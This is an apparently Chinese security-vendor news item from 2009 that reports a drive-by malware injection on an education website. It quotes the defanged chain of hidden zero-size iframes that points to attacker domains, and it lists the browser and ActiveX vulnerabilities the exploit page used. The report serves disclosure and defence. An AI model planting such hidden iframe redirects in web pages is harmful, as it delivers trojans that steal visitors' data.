English
 电子信箱
 加入收藏

  威盾防火墙 >> 新闻中心 >> 业界动态 >> 挂马播报:商都网教育宝典网站挂马事件

 

挂马播报:商都网教育宝典网站挂马事件

威盾防火墙 2009-03-17

 
2009年3月11日,商都网教育宝典(hxxp://edu.shangdu.com/)被黑客植入病毒,用户如果访问该网站,系统就会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制,盗取用户敏感信息。甚至导致死机。

该网站问题代码:

iframe marginwidth="0" marginheight="0" src="hxxp://edu.shangdu.com/2008_dd/982x70.html

hxxp://edu.shangdu.com/2008_dd/982x70.html恶意代码框架:

('<iframe src="hxxp://www.xm0567.cn/one/a21.htm" width="0" height="0"></iframe>');

hxxp://www.xm0567.cn/one/a21.htm恶意代码框架:

<iframe src=hxxp://www.sb3452.cn/a300/fxx.htm width=100 height=0></Iframe>

hxxp://www.sb3452.cn/a300/fxx.htm网马代码框架:

该网马利用以下漏洞来传播::

flash

MS09002漏洞

MS06014漏洞

MS Office Snapshot Viewer ActiveX Exploit 漏洞

新浪DLoader Class ActiveX控件

暴风影音2 mps.dll组件多个缓冲区溢出漏洞

联众游戏GLChat.ocx漏洞

RealPlayer Exploit

以上病毒文件为下载者木马和游戏盗号木马,自动运行后将会,盗取用户敏感信息,甚至导致死机。由于下载数量太多,这里不一一分析。

注:被挂马的地址是:hxxp://edu.shangdu.com/

【资料来源:安天实验室】


相关内容: 最新内容:
IE7最新漏洞成黑客新宠 用户需要小心谨防[2009-02-21]
黑客攻击微软IE漏洞 挂马网页逾两万[2008-12-16]
挂马播报:邵阳市人事信息网站挂马事件[2009-03-17]
用IIS高效管理网站(1)[2009-03-17]
简单三步走堵死SQLServer注入漏洞[2009-03-17]
请注意那些容易被忽略的SQL注入技巧[2009-03-17]
安全技巧:学会检查SQL注入式攻击漏洞[2009-03-17]
央视3·15晚会:黑客日均盗取3万个人信息[2009-03-16]